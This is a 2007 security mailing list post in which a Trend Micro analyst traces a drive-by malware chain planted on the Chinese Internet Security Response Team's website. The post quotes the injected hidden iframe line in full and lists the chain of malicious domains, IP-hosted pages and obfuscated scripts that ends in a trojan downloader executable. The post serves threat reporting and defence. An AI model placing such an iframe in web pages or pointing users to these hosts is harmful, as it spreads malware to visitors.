funsec mailing list archives
RE: Chinese Internet Security Response Team Website Hosting Malicious Cont ent
From: <Ivan_Macalintal () trendmicro com>
Date: Tue, 2 Oct 2007 13:45:19 -0700
Yep... CISRT is still VERY MUCH hosting malicious content. More info on the Trend Malware Blog... I've checked three pages: http:// www. cisrt.org/enblog/read.php?172 (This is the same link being shown in tech news sites like TheRegister - these guys should be advised to remove this link from their write-ups. http:// www. cisrt.org/enblog/ http:// www. cisrt.org/ They still have this IFRAME on the top of the page: <iframe src=http://mms.nmmmn.com/99916.htm width=0 height=0 frameborder=0></iframe> http:// mms.nmmmn.com/99916.htm loads oo.js and ax.htm which is full of more obfuscated scripts and at least one IFRAME to http:// 5x.3x7x.cn/t.htm The file t.htm has another IFRAME to http:// 60.191.247.178/aaa1.htm which in turn has these IFRAME links: http:// 60.191.247.178/Webxl.htm http:// 60.191.247.178/wm/wm2.htm http:// 60.191.247.178/wm/vip.htm http:// 60.191.247.178/wm/wm4.htm http:// 60.191.247.178/wm/wm5.htm And a script at: http:// js.users.51.la/1023960.js Where a couple of obfuscated JS'es are also downloaded and executed from: http:// 60.191.247.178/wm/nick.js http:// 60.191.247.178/wm/nick2.js They ultimately download and install http:// mms.nmmmn.com/sms.exe which is a trojan downloader downloading around 20 more binaries... Regards, Ivan Macalintal Senior Threat Analyst Trend Micro Inc. TREND MICRO EMAIL NOTICE The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system. _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- Re: Chinese Internet Security Response Team Website Hosting M alicious Cont ent Paul Ferguson (Oct 02)
- RE: Chinese Internet Security Response Team Website Hosting Malicious Cont ent Ivan_Macalintal (Oct 02)
- <Possible follow-ups>
- RE: Chinese Internet Security Response Team Website Hosting M alicious Cont ent Paul Ferguson (Oct 02)